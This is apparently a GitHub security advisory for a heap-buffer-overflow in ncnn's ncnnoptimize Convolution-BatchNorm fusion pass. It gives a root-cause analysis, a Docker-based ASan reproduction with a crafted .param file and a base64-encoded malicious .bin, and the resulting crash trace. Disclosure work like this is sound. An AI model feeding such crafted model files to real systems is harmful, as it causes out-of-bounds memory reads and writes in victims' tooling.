All advisories

Heap Overflow in Convolution-BatchNorm Fusion

Tencent/ncnn / GHSA-9x6f-53mq-62m9

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Heap Overflow in Convolution-BatchNorm Fusion

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: tools/ncnnoptimize.cpp:213 in NetOptimize::fuse_convolution_batchnorm
Sanitizer verdict: heap-buffer-overflow

Summary

ncnnoptimize's Convolution+BatchNorm fusion pass rewrites convolution weights through a float* without checking whether those weights were loaded as int8. A model that sets the convolution's int8_scale_term (param id 8) and stores its weights with the int8 tag in the .bin makes the pass scale a byte-sized buffer as if it held 4-byte floats, reading and writing past the end of the weight allocation. The PoC feeds the .param/.bin pair to ncnnoptimize, which crashes in NetOptimize::fuse_convolution_batchnorm() before any output file is written.

Detail

Two attacker-controlled fields combine here. Convolution::load_param() reads weight_data_size from param id 6 and int8_scale_term from param id 8 (src/layer/convolution.cpp:34), and Convolution::load_model() loads the weights with mb.load(weight_data_size, 0). When the corresponding record in the .bin starts with the tag 0x000D4B38, ModelBinFromDataReader::load() takes the int8 branch and returns a Mat with elemsize == 1 (src/modelbin.cpp:177). The runtime re-quantisation block in Convolution::load_model() is explicitly gated on weight_data.elemsize == (size_t)4u, so an already-int8 weight blob stays byte-sized.

The optimizer's fusion pass never consults int8_scale_term or weight_data.elemsize. It divides the element count by the BatchNorm channel count and then walks the buffer as floats:

// tools/ncnnoptimize.cpp:204
            const int weight_per_outch = convolution->weight_data_size / channels;

            float* weight = convolution->weight_data;
            float* bias = convolution->bias_data;
            for (int i = 0; i < channels; i++)
            {
                float* conv_weight_outch = weight + weight_per_outch * i;
                for (int j = 0; j < weight_per_outch; j++)
                {
                    conv_weight_outch[j] *= b[i];
                }

float* weight = convolution->weight_data; relies on Mat::operator float*(), which does not care that the underlying elements are one byte wide. In the PoC 6=26 and the BatchNorm declares 0=1, so weight_per_outch = 26 / 1 = 26 and the loop touches conv_weight_outch[0..25], i.e. bytes 0 through 103 of the buffer. The int8 Mat behind it was created by Mat::create(26, 1u): cstep = alignSize(26, 16) = 32, totalsize = 32, plus the 4-byte refcount and the 64-byte NCNN_MALLOC_OVERREAD tail gives the 100-byte region AddressSanitizer names. Element j = 25 sits at byte offset 100 — exactly one float past the end — and because the operation is *= the out-of-bounds read is immediately followed by an out-of-bounds write.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-overflow-in-convolution-batchnorm-fusion && cd ncnn-poc-heap-overflow-in-convolution-batchnorm-fusion

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'PARAM'
7767517
3 3
Input data 0 1 data 0=1 1=1 2=1
Convolution conv 1 1 data conv 0=1 1=1 6=26 8=1
BatchNorm bn 1 1 conv out 0=1
PARAM

base64 -d > poc.bin <<'BIN'
OEsNAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIA/AACAPwAAgD8AAAAAAACAPwAAAAA=
BIN

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param poc.bin out.param out.bin 0

AddressSanitizer output:

fuse_convolution_batchnorm conv bn
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x5100000000a4 at pc 0x5e9ed338782e bp 0x7ffd25640660 sp 0x7ffd25640650
READ of size 4 at 0x5100000000a4 thread T0
    #0 0x5e9ed338782d in NetOptimize::fuse_convolution_batchnorm() /ncnn/tools/ncnnoptimize.cpp:213
    #1 0x5e9ed33cfcff in main /ncnn/tools/ncnnoptimize.cpp:2805
    #2 0x7fd9984451c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #3 0x7fd99844528a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #4 0x5e9ed334f624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x5100000000a4 is located 0 bytes after 100-byte region [0x510000000040,0x5100000000a4)
allocated by thread T0 here:
    #0 0x7fd998abef1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x5e9ed341ebc5 in fastMalloc /ncnn/src/allocator.h:62
    #2 0x5e9ed341ebc5 in ncnn::Mat::create(int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:331
    #3 0x5e9ed344b309 in ncnn::ModelBinFromDataReader::load(int, int) const /ncnn/src/modelbin.cpp:177
    #4 0x5e9ed367d39c in ncnn::Convolution::load_model(ncnn::ModelBin const&) /ncnn/src/layer/convolution.cpp:63
    #5 0x5e9ed34bba84 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2080
    #6 0x5e9ed34bc90a in ncnn::Net::load_model(_IO_FILE*) /ncnn/src/net.cpp:2257
    #7 0x5e9ed34bcc91 in ncnn::Net::load_model(char const*) /ncnn/src/net.cpp:2292
    #8 0x5e9ed33cfcaf in main /ncnn/tools/ncnnoptimize.cpp:2797
    #9 0x7fd9984451c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #10 0x7fd99844528a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #11 0x5e9ed334f624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/tools/ncnnoptimize.cpp:213 in NetOptimize::fuse_convolution_batchnorm()

Credit

Zheng Yu @ DepthFirst